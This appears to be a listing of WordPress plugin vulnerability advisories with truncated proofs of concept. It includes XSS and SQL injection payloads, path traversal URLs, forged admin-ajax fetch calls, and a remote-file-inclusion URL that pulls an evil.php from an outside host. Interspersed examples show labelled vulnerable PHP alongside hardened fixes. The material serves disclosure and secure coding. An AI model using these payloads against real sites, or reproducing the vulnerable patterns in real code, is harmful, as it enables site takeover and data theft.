4359 matches found
WP HTML Mail < 3.1.3 - Reflected Cross-Site Scripting
The plugin does not escape some URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting. PoC: https://example.com/wp-admin/options-general.php?page=wp-html-mail&tab=advanced&a"alert/XSS/...
RW Divi Unite Gallery <= 1.0 - Security Bypass via Outdated Freemius
The plugin is vulnerable to a security bypass due to the use of a known vulnerable component, the Freemius SDK (versions before 2.2.4). The plugin bundles Freemius 1.0.0 and is therefore vulnerable. The core issue that causes the vulnerability is in the setdboption function, which is exposed to any authenticated user with no...
Relevanssi - Subscriber+ Unauthorised AJAX Calls
The plugins do not have authorisation and CSRF checks in some of their AJAX actions, allowing any authenticated user, such as a subscriber, to call them. This could disclose information to subscribers, as well as allow them to truncate the index, which will disable the search...
Ad Inserter < 2.7.11 - Admin+ RCE / Stored XSS
The plugin does not make any security checks regarding the PHP and JS code in blocks, allowing high privilege users such as admin to execute commands on the underlying OS as well as perform Stored Cross-Site Scripting attacks even in multisite blogs and hardened ones. 1. Go to Settings - Ad...
Catch Web Tools < 2.7.1 - Subscriber+ Arbitrary Catch IDs Activation/Deactivation
The plugin does not have authorisation and CSRF checks in its catchwebtoolscatchidsswitch AJAX action, allowing any authenticated user, such as a subscriber, to activate/deactivate Catch IDs. PoC: fetch("https://example.com/wp-admin/admin-ajax.php", {"headers": {"content-type":...
WP Extra File Types < 0.5.1 - CSRF to Stored Cross-Site Scripting
The plugin does not have a CSRF check when saving its settings, nor does it sanitise and escape some of them, which could allow attackers to make a logged in admin change them and perform Cross-Site Scripting attacks. PoC: var form1 = document.getElementById('hack'); form1.submit();...
Rich Reviews by Starfish < 1.9.6 - Admin+ SQL Injection
The plugin does not properly validate the orderby GET parameter of the pending reviews page before using it in a SQL statement, leading to an authenticated SQL injection issue. Error-based SQLi: orderby=id AND EXTRACTVALUE(4795,CONCAT(0x5c,0x717a627871,(SELECT (ELT(4795=4795,1))),0x7176707071)) Time-based...
WP Tiles <= 1.1.2 - Contributor+ Stored XSS
The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. PoC: wp-tiles extraclasses='"...
uTubeVideo Gallery < 2.0.8 - Contributor+ Stored XSS
The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. PoC: utubevideo view='panel' id='"...
Widgets for Google Reviews < 9.8 - Contributor+ Stored XSS
The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins. Exploit...
Superforms < 6.0.4 - Reflected Cross-Site Scripting
The plugin does not escape the bobczypanstwasprawazostalarozwiazana parameter before outputting it back in an attribute via the superlanguageswitcher AJAX action, leading to a Reflected Cross-Site Scripting. The action also lacks a CSRF check, making the attack easier to perform against any user...
Directories Pro < 1.3.46 - Authenticated Self-Reflected Cross-Site Scripting
The plugin did not sanitise the column names when importing a malicious CSV file, allowing for HTML or JavaScript injection. Import a CSV file containing the following in the header: 'term" autofocus onfocus=alert('Complex\u0020XSS');alert(document.cookie);//'"...
Welcart e-Commerce < 2.8.5 - Subscriber+ Arbitrary File Access
The plugin does not validate user input before using it to output the content of a file via an AJAX action available to any authenticated user, which could allow users with a role as low as subscriber to read arbitrary files on the server. Run the below command in the developer console of the we...
English WordPress Admin < 1.5.2 - Unauthenticated Open Redirect
The plugin does not validate the admincustomlanguagereturnurl parameter before redirecting users to it, leading to an open redirect issue. PoC: https://example.com/wp-admin/admin-ajax.php?action=heartbeat&admincustomlanguagetoggle=1&admincustomlanguagereturnurl=https://wpscan.com...
Thank Me Later <= 3.3.4 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape the Message Subject field before outputting it in the Messages list, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. Add/Edit a message and put the following...
WP-Appbox < 4.3.18 - Authenticated Local File Inclusion
The plugin does not validate user input before using it to create a local path that is then passed to an include_once statement, leading to a Local File Inclusion issue. PoC: https://example.com/wp-admin/options-general.php?page=wp-appbox&tab=advanced%2F..%2F...
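The WP-Appbox entry describes the classic settings-tab include pattern. The following is an added example written for this page, not WP-Appbox's own code: a hypothetical plugin that loads a tab file from a tabs/ directory (the directory layout, tab names and function names are assumptions). The vulnerable form concatenates the tab parameter straight into the include path, so a traversal value like the PoC's advanced%2F..%2F... walks out of the tabs/ directory; the hardened form whitelists the tab name and confirms the resolved path is still inside tabs/ before including it.

```php
<?php
// Added example, not code from WP-Appbox. The 'tabs/' layout, the tab names
// and the demo_* function names are assumptions made for illustration.

// Vulnerable: $_GET['tab'] is used as-is to build the path. A request with
// tab=advanced/../../../some/other/file includes any .php file the web server
// can read (the appended '.php' cannot be evaded with a null byte on modern PHP,
// so the target must genuinely end in .php, but that still covers wp-config.php
// or any attacker-controlled upload that was given a .php name).
function demo_render_tab_vulnerable() {
    $tab = isset( $_GET['tab'] ) ? $_GET['tab'] : 'general';
    include_once plugin_dir_path( __FILE__ ) . 'tabs/' . $tab . '.php';
}

// Hardened: the tab name must be one of a fixed set, and the resolved path is
// checked against the tabs/ directory before anything is included.
function demo_render_tab_hardened() {
    $tabs = array( 'general', 'advanced', 'about' );
    $tab  = isset( $_GET['tab'] ) ? sanitize_key( wp_unslash( $_GET['tab'] ) ) : 'general';
    if ( ! in_array( $tab, $tabs, true ) ) {
        $tab = 'general';
    }

    $base = realpath( plugin_dir_path( __FILE__ ) . 'tabs' );
    $file = realpath( plugin_dir_path( __FILE__ ) . 'tabs/' . $tab . '.php' );

    // realpath() returns false for a missing file and collapses any '..' so a
    // prefix comparison against the tabs/ directory is meaningful.
    if ( false === $base || false === $file
        || 0 !== strpos( $file, $base . DIRECTORY_SEPARATOR ) ) {
        wp_die( 'Invalid settings tab.' );
    }

    include_once $file;
}
```

The whitelist alone closes the traversal; the realpath() prefix check is defence in depth for the day someone adds a tab name that is built from another input.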
Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue < 3.1.31 - Reflected Cross-Site Scripting
The plugin does not escape the lang and pid parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues. PoC: https://example.com/wp-admin/admin.php?sibpageform&action=edit&id=1&pid=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22...
Leads-5050 Visitor Insights < 1.1.0 - Unauthorised License Change
The leads5050setlicense AJAX action is available to authenticated users, but is missing any capability and CSRF checks. This could allow any low privilege user (subscriber+) to set an arbitrary license in the plugin's settings. PoC: POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Accept: application/jso...
Workup – Job Board < 2.1.6 - Unauthenticated Reflected XSS
An Unauthenticated Reflected XSS vulnerability was discovered in the «Workup – Job Board WordPress Theme», tested on v2.1.5...
Advanced Custom Fields <= 5.7.10 - Unserialize of user input
Multiple maybe_unserialize() calls result in unserialize() being run on user input. The affected code is reachable by low privileged users such as contributors and, in many cases, by unauthenticated visitors too. https://medium.com/websec/wordpress-acf-5-7-10-unserialize-of-user-input-ac17cc473e0d...
Wordfence <= 7.1.12 - Username Enumeration Prevention Bypass
The Wordfence Security – Firewall & Malware Scan WordPress plugin was affected by a Username Enumeration Prevention Bypass security vulnerability. Wordfence blocks: http://www.example.com/?author=1 But allowed: http://www.example.com/?author=1...
DiveBook <= 1.1.4 - Unauthenticated SQL Injection
The filterdiver GET parameter, in pages where the DiveBook is embedded, is not properly sanitised and validated, leading to an Unauthenticated SQL injection vulnerability. The PoC will be displayed once the issue has been remediated...
GS Books Showcase < 1.3.1 - Contributor+ Stored XSS
The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. PoC: gsbookshowcase theme='" onmouseover="alert(1)...
Weblizar Pin It Button On Image Hover And Post < 3.4 - Subscriber+ Arbitrary Settings Update
The plugin does not have authorisation and proper CSRF checks when saving its settings, allowing any authenticated user, such as a subscriber, to update them. PoC: fetch("https://example.com/wp-admin/admin-ajax.php", {"headers": {"content-type": "application/x-www-form-urlencoded"}, "body": new...
Magee Shortcodes < 2.0.9 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape various parameters before outputting them back in attributes in AJAX actions available to both unauthenticated and authenticated users, leading to Reflected Cross-Site Scripting issues...
SupportCandy < 2.2.7 - CSRF to Cross-Site Scripting
The plugin does not have CSRF check in the wpsctickets AJAX action, nor has any sanitisation or escaping in some of the filter fields which could allow attackers to make a logged in user having access to the ticket lists dashboard set an arbitrary filter stored in their cookies with an XSS payloa...
True Ranker < 2.2.4 - Unauthenticated Arbitrary File Access via Path Traversal
The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the /admin/vendor/datatables/examples/resources/examples.php file. Exploit Authors: Nicole Sheinin, Liad Levy Tested on: MacOS #!/usr/bin/env python3 impo...
Vanguard <= 2.1 - Multiple Cross-Site Scripting (XSS)
The plugin does not sanitise, validate or escape some of its parameters before outputting them back in various places, leading to either Stored or Reflected Cross-Site Scripting issues. Put the following payload in the In Products Search box: " POST /search HTTP/1.1 Accept:...
WP Code Highlight.js < 0.6.3 - CSRF to Stored XSS
Lack of CSRF checks could allow attackers to make a logged in admin create XSS payloads. PoC: document.getElementById('hljs').submit();...
Replyable < 2.2.10 - Subscriber+ PHP Object Injection
The plugin does not validate the class name submitted by the request when instantiating an object in the promptdismissnotice action, and also lacks a CSRF check in the related action. This could allow any authenticated user, such as a subscriber, to perform Object Injection attacks. The attack could...
Show All Comments < 7.0.1 - Reflected XSS
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege user such as an admin. Visit the following URL, authenticated or not, to trigger an alert box:...
Error Log Viewer Plugin <= 1.1.1 - Admin+ Arbitrary File Clearing
The plugin does not validate the path of the log file to clear, allowing high privilege users to clear arbitrary files on the web server, including those outside of the blog folder Click the "Log Monitor" available under Error Log Viewer menu item. Choose a log file to clear. Intercept the reques...
GTranslate < 2.8.52 - Unauthenticated Reflected Cross Site Scripting (XSS)
The GTranslate plugin before 2.8.52 for WordPress was vulnerable to an Unauthenticated Reflected XSS vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option. The vulnerability was due to outputting the WordPress add_query_arg...
WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
According to the WordPress release notes: "Props to Soroush Dalili @irsdl from NCC Group for disclosing an issue with URL sanitization that can lead to cross-site scripting XSS attacks." Thanks to @irsdl's HackerOne disclosure: JS - Numerical Entities JS - Hex Entities...
GS Portfolio for Envato < 1.4.0 - Contributor+ Stored XSS
The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks Insert the following shortcode in a...
Crazy Bone <= 0.6.0 - Unauthenticated Stored XSS
The plugin does not sanitise and escape the username submitted via the login form when displaying it back in the log dashboard, leading to an unauthenticated Stored Cross-Site Scripting. PoC: curl 'https://example.com/wp-login.php' --data-raw 'log=a&pwd=x&wp-submit=Log+In' The XSS will be triggered in...
IP2Location Country Blocker < 2.26.5 - Subscriber+ Arbitrary Country Ban
The plugin does not have authorisation and CSRF checks in the ip2locationcountryblockersaverules AJAX action, allowing any authenticated user, such as a subscriber, to call it and block arbitrary countries, or block all of them at once, preventing users from accessing the frontend. v2.26.5 added...
Accept Donations with PayPal < 1.3.4 - Arbitrary Post Deletion via CSRF
The plugin does not have a CSRF check in place and does not ensure that the post to be deleted belongs to the plugin, allowing attackers to make a logged in admin delete arbitrary posts from the blog. PoC: https://example.com/wp-admin/admin.php?page=wpedonmenu&action=delete&action2=delete&order=1...
Download Manager < 3.2.22 - Subscriber+ Stored Cross-Site Scripting
The plugin does not sanitise and escape Template data before outputting it in various pages such as the admin dashboard and frontend. Due to the lack of authorisation and CSRF checks in the wpdmsavetemplate AJAX action, any authenticated user, such as a subscriber, is able to call it and perform...
Members List < 4.3.7 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape some parameters in various pages before outputting them back, leading to Reflected Cross-Site Scripting issues. PoC: https://example.com/wp-content/plugins/members-list/admin/view/user.php?page=%22%3E%3Cimg/src/onerror=alert(/XSS/)%20x...
Core Tweaks WP Setup <= 4.1 - Arbitrary Admin Account Creation / Admin Email Update via CSRF
The plugin allows many WordPress settings to be bulk-set, including the admin email, as well as creating a new admin account. There is no CSRF protection in place, allowing an attacker to arbitrarily change the admin email or create another admin account and take over the website via CSRF attacks...
Magazine Edge <= 1.13 - Subscriber+ Arbitrary Plugin Activation
The theme does not have authorisation and CSRF checks when activating plugins via an AJAX action, allowing any authenticated user, such as a subscriber, to activate arbitrary plugins. Run the below command in the developer console of the web browser while being on the blog as a subscriber user...
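The Relevanssi, Catch Web Tools, Leads-5050, Weblizar Pin It, IP2Location Country Blocker, Download Manager and Magazine Edge entries above all share one root cause: a wp_ajax_* handler that any logged-in user can reach and that checks neither a nonce nor a capability, so a subscriber can call it from the browser console with a plain fetch() to admin-ajax.php. The following is an added example written for this page, not code from any of those plugins or themes: a hypothetical "demo_save_rules" action (the action name, option name, capability choice and function names are assumptions), first in the vulnerable shape and then with the checks a plugin should make. The same nonce idea, with check_admin_referer() instead of check_ajax_referer(), is what the CSRF-to-settings entries (WP Extra File Types, WP Code Highlight.js, Marketo Forms, Core Tweaks WP Setup) are missing.

```php
<?php
// Added example, not code from any plugin listed on this page. The action
// name 'demo_save_rules', the option 'demo_rules', the page hook
// 'settings_page_demo' and the script handle 'demo-admin' are assumptions.

// Vulnerable: every wp_ajax_{action} hook is reachable by any authenticated
// user regardless of role. Nothing here asks who is calling or whether the
// request was intended, so a subscriber (or a CSRF page visited by an admin)
// can overwrite the option with whatever they like.
function demo_save_rules_vulnerable() {
    $rules = isset( $_POST['rules'] ) ? (array) $_POST['rules'] : array();
    update_option( 'demo_rules', $rules );
    wp_send_json_success();
}
add_action( 'wp_ajax_demo_save_rules_vulnerable', 'demo_save_rules_vulnerable' );

// Hardened: three independent checks, in this order.
//   1. check_ajax_referer()  - the request carries a valid nonce for this
//                              action (CSRF). It terminates the request on
//                              failure.
//   2. current_user_can()    - the caller actually holds the capability the
//                              action needs (authorisation). A valid nonce
//                              alone proves nothing about role.
//   3. sanitise the input    - the stored value is what the option expects.
function demo_save_rules_hardened() {
    check_ajax_referer( 'demo_save_rules', 'nonce' );

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $rules = isset( $_POST['rules'] ) ? (array) wp_unslash( $_POST['rules'] ) : array();
    $rules = array_map( 'sanitize_text_field', $rules );

    update_option( 'demo_rules', $rules );
    wp_send_json_success();
}
add_action( 'wp_ajax_demo_save_rules', 'demo_save_rules_hardened' );

// The nonce the hardened handler expects is minted only on the plugin's own
// settings page, for the script (handle assumed) that issues the AJAX call.
function demo_enqueue_admin_script( $hook ) {
    if ( 'settings_page_demo' !== $hook ) {
        return;
    }
    wp_localize_script( 'demo-admin', 'demoAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'demo_save_rules' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'demo_enqueue_admin_script' );
```

When reviewing a plugin, grep for add_action( 'wp_ajax_ and confirm each callback has both checks; a nonce without a capability check is the pattern most of the Subscriber+ entries above fall into, because wp_create_nonce() happily mints nonces for subscribers too.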
GS Filterable Portfolio < 1.6.1 - Contributor+ Stored XSS
The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. Note: First, you need to add a Portfolio...
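The WP Tiles, uTubeVideo Gallery, Widgets for Google Reviews, GS Books Showcase, GS Portfolio for Envato and GS Filterable Portfolio entries are all the same bug: a shortcode callback echoes an attribute into HTML without escaping. Contributors cannot post raw HTML (no unfiltered_html), but WordPress's shortcode parser lets a single-quoted attribute contain double quotes, which is why the PoCs look like theme='" onmouseover="alert(1)'. The following is an added example written for this page, not code from any of those plugins: a hypothetical [demo_gallery] shortcode (the shortcode and attribute names are assumptions) in its vulnerable and hardened forms.

```php
<?php
// Added example, not code from any plugin listed on this page. The shortcode
// name 'demo_gallery' and its 'theme' / 'id' attributes are assumptions.

// Vulnerable: the attribute values are dropped straight into attribute
// context. A contributor writing
//   [demo_gallery_vulnerable theme='" onmouseover="alert(1)']
// closes the class attribute and adds an event handler; the payload is stored
// with the post and fires for whoever previews or reads it, including the
// editor or admin who reviews the contributor's draft.
function demo_gallery_vulnerable( $atts ) {
    $atts = shortcode_atts( array( 'theme' => 'light', 'id' => '0' ), $atts, 'demo_gallery' );
    return '<div class="demo-gallery ' . $atts['theme'] . '" data-id="' . $atts['id'] . '"></div>';
}
add_shortcode( 'demo_gallery_vulnerable', 'demo_gallery_vulnerable' );

// Hardened: validate what has a known shape (an id is an integer, a theme is
// one of a fixed set) and escape everything at the point of output. esc_attr()
// is the right call for attribute context; esc_html() for text nodes,
// esc_url() for href/src.
function demo_gallery_hardened( $atts ) {
    $atts  = shortcode_atts( array( 'theme' => 'light', 'id' => '0' ), $atts, 'demo_gallery' );
    $theme = in_array( $atts['theme'], array( 'light', 'dark' ), true ) ? $atts['theme'] : 'light';
    $id    = absint( $atts['id'] );
    return sprintf(
        '<div class="demo-gallery %s" data-id="%d"></div>',
        esc_attr( $theme ),
        $id
    );
}
add_shortcode( 'demo_gallery', 'demo_gallery_hardened' );
```

Escaping alone would already stop the breakout; the whitelist is there because a CSS class built from free text is still a foothold for things like class-name injection into other selectors, and because an attribute that is never meant to be free text should not be treated as such.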
WPcalc <= 2.1 - Authenticated SQL Injection
The plugin does not sanitise user input in the 'did' parameter before using it in a SQL statement, leading to an authenticated SQL Injection vulnerability. Plugin author closed the plugin. PoC: http://www.example.com/wp-admin/admin.php?page=wpcalc&info=del&did=1 AND (SELECT 7156 FROM (SELECT(SLEEP(5)))MIkl) or,...
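The Rich Reviews and WPcalc entries show the two ways plugin SQL usually goes wrong: a value (did) concatenated instead of bound, and an identifier (orderby) that cannot be bound through $wpdb->prepare() and so is concatenated raw. The following is an added example written for this page, not code from either plugin: a hypothetical listing query (the table and column names are assumptions) in the vulnerable shape that the EXTRACTVALUE and SLEEP payloads above exploit, and in a hardened shape that whitelists the identifier and prepares the value.

```php
<?php
// Added example, not code from Rich Reviews or WPcalc. The table
// {$wpdb->prefix}demo_reviews and its columns are assumptions.

// Vulnerable: both the integer value and the ORDER BY identifier come from
// $_GET and are concatenated. Either of
//   did=1 AND (SELECT 7156 FROM (SELECT(SLEEP(5)))MIkl)
//   orderby=id AND EXTRACTVALUE(4795,CONCAT(0x5c,...))
// is executed as SQL.
function demo_list_reviews_vulnerable() {
    global $wpdb;
    $orderby = isset( $_GET['orderby'] ) ? $_GET['orderby'] : 'id';
    $did     = isset( $_GET['did'] ) ? $_GET['did'] : '0';
    return $wpdb->get_results(
        "SELECT * FROM {$wpdb->prefix}demo_reviews WHERE did = $did ORDER BY $orderby"
    );
}

// Hardened: placeholders cannot name a column, so the identifier and the
// direction are chosen from fixed lists; the value goes through prepare().
function demo_list_reviews_hardened() {
    global $wpdb;

    $allowed_columns = array( 'id', 'date', 'rating' );
    $orderby = 'id';
    if ( isset( $_GET['orderby'] ) && in_array( $_GET['orderby'], $allowed_columns, true ) ) {
        $orderby = $_GET['orderby'];
    }

    $order = 'ASC';
    if ( isset( $_GET['order'] ) && 'desc' === strtolower( $_GET['order'] ) ) {
        $order = 'DESC';
    }

    $did = isset( $_GET['did'] ) ? absint( $_GET['did'] ) : 0;

    // $orderby and $order are now known-safe literals, so interpolating them
    // is fine; %d binds the user-supplied value.
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}demo_reviews WHERE did = %d ORDER BY $orderby $order",
        $did
    );
    return $wpdb->get_results( $sql );
}
```

Core also ships sanitize_sql_orderby(), which rejects strings that do not look like a column list with optional ASC/DESC; it is a reasonable second line of defence, but an explicit whitelist is simpler to reason about and also blocks sorting on columns the page was never meant to expose.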
Contact Form & Lead Form Elementor Builder < 1.6.4 - Unauthenticated Stored Cross-Site Scripting
The plugin does not sanitise and escape some lead values, which could allow unauthenticated users to perform Cross-Site Scripting attacks against a logged in admin viewing the inserted Leads. PoC: fetch("https://example.com/wp-admin/admin-ajax.php", {"headers": {"content-type":...
Page Builder by SiteOrigin < 2.10.16 - CSRF to Reflected Cross-Site Scripting (XSS)
Flaws in the live editor and actionbuildercontent functions of the plugin "allow attackers to forge requests on behalf of a site administrator and execute malicious code in the administrator’s browser. The attacker needs to trick a site administrator into executing an action, like clicking a link...
Art-Picture-Gallery <= 1.2.9 - Unauthenticated Arbitrary File Upload
Edit (WPScan Team): March 26th, 2020 - Report Received & Vendor Contacted. March 30th, 2020 - Escalated to WP Plugins team as no response from vendor. March 31st, 2020 - WP Plugins team investigating & Plugin closed. April 2nd, 2020 - Disclosure. The PoC will be displayed once the issue has been remedia...
Marketo Forms and Tracking <= 1.0.2 - CSRF to XSS
Lack of CSRF checks and sanitisation on the plugin's settings page could allow XSS attacks via CSRF. PoC: document.getElementById('csrf').submit();...
The Events Calendar < 5.14.0 - Reflected Cross-Site Scripting
The plugin does not escape an aggregator URL before outputting it back in an attribute, leading to Reflected Cross-Site Scripting. When there is an Event Aggregator license key active: https://example.com/wp-admin/edit.php?page=tribe-common&tab=imports&posttype=tribeevents&"alert/XSS/...
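The WP HTML Mail, Sendinblue, Members List, GTranslate and The Events Calendar entries are the reflected variant of the attribute-context bug: the plugin rebuilds the current URL (typically with add_query_arg(), which works from $_SERVER['REQUEST_URI'] and does not escape its result) or echoes a GET parameter into a form action, hidden input or link. The PoCs above all append a&" or pid=xxx" onclick=... to an admin URL for exactly this reason. The following is an added example written for this page, not code from any of those plugins: a hypothetical settings page (page slug, parameter names and function names are assumptions) shown vulnerable and then hardened with esc_url() / esc_attr() and a URL built from a known base.

```php
<?php
// Added example, not code from any plugin listed on this page. The page slug
// 'demo', the 'tab' and 'pid' parameters and the function names are assumptions.

// Vulnerable: add_query_arg() with no base URL uses the raw request URI and
// returns it unescaped, and $_GET['pid'] is echoed straight into an attribute.
// Either of
//   options-general.php?page=demo&a"><img src onerror=alert(1)>
//   options-general.php?page=demo&pid=xxx" onclick="alert(1)
// reflects the payload into the admin's page.
function demo_settings_page_vulnerable() {
    $pid = isset( $_GET['pid'] ) ? $_GET['pid'] : '';
    echo '<form method="post" action="' . add_query_arg( 'tab', 'advanced' ) . '">';
    echo '<input type="hidden" name="pid" value="' . $pid . '">';
    echo '</form>';
}

// Hardened:
//   - values with a known shape are validated first (an id is an integer, a
//     tab slug is [a-z0-9_-]);
//   - the form action is built from a fixed base URL, not the request URI, so
//     stray parameters an attacker appends never reach the output at all;
//   - whatever is still output is escaped for its context: esc_url() for the
//     URL, esc_attr() for the attribute value.
function demo_settings_page_hardened() {
    $pid = isset( $_GET['pid'] ) ? absint( $_GET['pid'] ) : 0;
    $tab = isset( $_GET['tab'] ) ? sanitize_key( wp_unslash( $_GET['tab'] ) ) : 'general';

    $action = add_query_arg(
        array( 'page' => 'demo', 'tab' => $tab ),
        admin_url( 'options-general.php' )
    );

    echo '<form method="post" action="' . esc_url( $action ) . '">';
    echo '<input type="hidden" name="pid" value="' . esc_attr( $pid ) . '">';
    echo '</form>';
}
```

Note that esc_url() is not a sanitiser for the whole problem: it keeps the URL well-formed and safe inside an attribute, but if the page really must echo the current URI, the escaping must happen at every output point, not once at the top of the function.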
Button Generator < 2.3.3 - RFI leading to RCE via CSRF
The wow-company admin menu page of the plugin allows arbitrary files to be included, with a PHP extension as well as via the data:// or http:// stream wrappers, thus leading to RCE via CSRF. PoC: http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...